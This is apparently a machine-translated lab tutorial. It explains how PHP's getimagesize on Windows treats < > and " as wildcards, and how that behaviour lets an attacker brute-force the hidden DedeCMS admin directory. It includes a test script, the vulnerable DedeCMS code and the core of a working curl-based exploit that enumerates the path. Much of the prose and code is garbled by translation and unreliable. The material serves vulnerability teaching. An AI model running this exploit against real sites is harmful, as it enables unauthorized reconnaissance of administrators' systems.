Website Vulnerability--the security risk of File judging function (actual combat article)

PHP is a common open-source scripting language with C as the underlying language, supports almost all popular databases and operating systems, and is much more efficient than CGI, which is fully generated HTML markup, and is primarily suitable for web development. The most important thing is that PHP can be used in C, C + + program extension!

All the file operation functions are sensitive functions, when such functions are used improperly or unsafe references, it will lead to problems in business logic, which can lead to many security risks, such as: arbitrary file download, arbitrary file writing, arbitrary file deletion and other vulnerabilities.

The following gives you a vivid explanation of the problems that can be caused by the file judgment function Getimagesiz, and refers to the DEDECMS directory to solve the problem, and to describe the harm that PHP does when referencing such functions in unsafe situations.

Hope the old iron through this wave operation, understand the vulnerability formation principle and the risk of similar file judgment function, in the experimental environment personally experience a more sense oh, with me to open it! >>>>> file function Experiment Portal

1, the goal of hands-on experiment:

• Learn about common PHP functions
• Understanding PHP file Judgment function risk
• Understand the business logic vulnerabilities that file operations can bring

2, the required tools:

• Hackbar: Hackbar is a plugin in Firefox Firefox that will help you test SQL injection, XSS vulnerabilities, and site security. The main is to help developers to conduct security audits of his code. The ability to quickly encode strings in various ways.

3, the actual operation of the contents:

This PHP section introduces some of the functions that can be found when using PHP on Windows to invoke one FindFirstFileExW() of the underlying Windows API functions.

Explain the vulnerabilities of some of these functions when they are unsafe to use, and use an dedecms instance to PHP Windows find their background using the features on top, so that we can gain a deeper understanding of the possible hazards of these functions.

Some of the PHP language functions have the following wonderful features on Windows systems:

The greater than sign (>) equals the wildcard question mark (?) The less than sign (<) is equivalent to a wildcard asterisk ( *) Double quotation mark ( ") equivalent to the dot character (.).     

This feature has long been discovered by foreign security researchers.

getimagesizeThis feature is present in the PHP method.

In the PHP source code, php-src\ext\standard\image.c there is a specific definition of this method:

... /* {{{proto array getimagesize (string imagefile [, array info]) Get The size of an   image as 4-element array */php _function (getimagesize) {    php_getimagesize_from_any (internal_function_param_passthru, FROM_PATH);} ...

Methods are called in the getimagesize method php_getimagesize_from_any , and if dynamic debugging is used to simplify the entire analysis process, tracing is followed by layers to discover

getimagesizeThe invocation order is as follows:

Php_function (getimagesize) PHP_GETIMAGESIZE_FROM_ANY...TSRM_REALPATH_RFINDFIRSTFILEEXW

The dynamic debugging of this experiment does not do the key explanation, the detailed procedure please refer to the following link: https://xianzhi.aliyun.com/forum/topic/2004

Finally, the way to see PHP getimagesize eventually calls the Windows APIFindFirstFileExW()

In fact, because PHP does not filter, prohibit, and use these special characters at the language level, < > getimagesize Any file-judging function that calls the Windows API method may have the above problem except the function

4. Experimental content:

In this experiment, we will use a winapi specific instance function called this to getimagesize explain the PHP function in the call to the underlying winapi method will exist problems.

Also referred to dedecms as a high-level instance, the security risk exists when unsafe references to this function of the underlying method are also used winapi getimagesize .

Steps to verify the getimagesize () function locally

Use the search tool in our lab Everything to find our phpstudy installation environment. Installing the PHP Environment

After the installation is complete, we C:\phpStudy\www will create a new test.php file validation function in the directory, depending on the getimagesize installation path, depending on the phpStudy actual situation.

Next we're going to C:\phpStudy\www create a new directoryasdasdasd

Directory under

test.phpThe code is as follows:

<?php$a =  $_get[' img '];exec (' pause ');  if (@getimagesize ($a)) {     "OK";} ?>    

When you're ready, let's visittest.php

Access addresshttp://127.0.0.1/test.php?img=C:\phpStudy\www\a<\1.png

Page return ok , visible in the normal path should be asdasdasd the original directory name, used by US a< instead, getimagesize the use of this feature to successfully load the image file.

Step 2--dedecms Background Address guess

In the following example, we can use the script provided in this section to obtain dedecms a background address

This vulnerability occurs in the getimagesize function, and the PHP getimagesize method is finally called in the previous article mentioned in the Windows API FindFirstFileExW() above, also shows that here on Windows, and < > " three words are given different meanings.

That's why the dedecms backstage can be blasted.

Here, let's look at the trigger condition of the vulnerability.

In the dedecms uploadsafe.inc.php core code in the following

... if (In_array (Strtolower (Trim (${$_key) _type '}), $imtypes)) {    $image _dd = @getimagesize ($$_key);         if (!is_array ($image _dd))    {        exit (' Upload filetype not allow! ');}    } ...

Here uploadsafe.inc.php directly call the getimagesize method to get the size of the file, get not the description is not the picture or the picture does not exist, do not save the exit upload ..., using this logic to guess the directory is a directory of files in the image format.

At this point, the file is loaded in dedecms the tags.php common.inc.php

Loaded on about common.inc.php 148 rows or so.uploadsafe.inc.php

if ($_files) {    require_once (dedeinc.') /uploadsafe.inc.php ');} 

Here we can get the file reference relationship as follows tags.php : common.inc.php uploadsafe.inc.phpgetimagesize()

EXP Analysis and Utilization

In the lab environment we will provide access to our library of tools collected on the Internet to exp http://tools.ichunqiu.com/y688t6z4 download

Let's take a look at the main code sections in Exp:

 ... if ($path) {while (($path = My_func ($url, $path))) {echo strtolower ($path).    else {for ($i = 48; $i <= 90; $i + +) {if ((48 <= $i && $i <= 57) or (65 <= $i && $i <= 90)" {$path = My_func ($url, Chr ($i)); while ($path) {echo strtolower ($path).  

This code can be used to refer to the if((48 <= $i && $i <= 57) or (65 <= $i && $i <= 90)) ASCII code table to understand the specific meaning of the numbers

is to put all the directories that may appear, 0-9 and the bitwise a-z into the program to go to the exhaustive match

The following code is the core part of the entire exp

...functionMy_func($url, $path =") {$ch = Curl_init ($url); $i =48;Global $version;while ($i <=90) {if ((<= $i && $i <=57)or (<= $i && $i <=90)) {if ($version! =' 5.7 ') {/* v5.6 version and below */$admin _path =‘./‘ . $path. Chr ($i).' </img/admin_top_logo.gif '; }else {/* v5.7 version */$admin _path =  ".". $path. Chr ($i).  ' </images/admin_top_logo.gif '; } $data =  ' dopost=save&_files[b4dboy][tmp_name]= '. $admin _path.  ' &_files[b4dboy][name]=0&_files[b4dboy][size]=0&_files[b4dboy][type]=image/gif '; $options = array (curlopt_useragent =  ' firefox/58.0 ', Curlopt_returntransfer = true, curlopt_post = true, Curlopt_postfields = $data,); Curl_setopt_array ($ch, $options); $response = curl_exec ($ch); if (!preg_match (return $path;} } $i + +; }...

This exp is the use dedecms of a small defect in the design time, when a directory exists in a picture file, the program will return the correct, when it does not exist when the program throws an exception, prompt Upload filetype not allow ! .

At this point in dedecms the foreground can call the method directly, this time getimagesize() we selected a dedecms background directory of a known picture admin_top_logo.gif with us to guess the solution. See the following code for details:

' </img/admin_top_logo.gif ';

This allows us to refer to the wildcard character < , to match the background address, to the background address bit-wise, this is our central idea exp .

Here's how:

We downloaded exp.php , put into the PHP installation directory, here we put c:\phpStudy\php53 down, this path according to the phpStudy installation path and the choice of PHP version, please depend on the actual situation.

Successfully guessed out the background address.

analysis and summary of experimental results:

• The root cause of the problem is the PHP call Windows API in the FindFirstFileExW() / FindFirstFile() method
• This Windows API method has been specially processed for this three-character
• Interested students can also be based on our experimental ideas to find other ways to use and loopholes.

Some thoughts:

• What other functions does PHP have to invoke Windows API when there are new features?
• Windows APIdoes this feature appear in other languages that call this?

Reference Address:

• Http://wps2015.org/drops/drops/PHP%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E6%80%9D%E8%B7%AF+%E5%AE%9E%E4%BE%8B.html
• Http://www.cnblogs.com/yxhblogs/p/5839800.html
• https://xianzhi.aliyun.com/forum/topic/2064
• https://xianzhi.aliyun.com/forum/topic/2004

Website Vulnerability--the security risk of File judging function (actual combat article)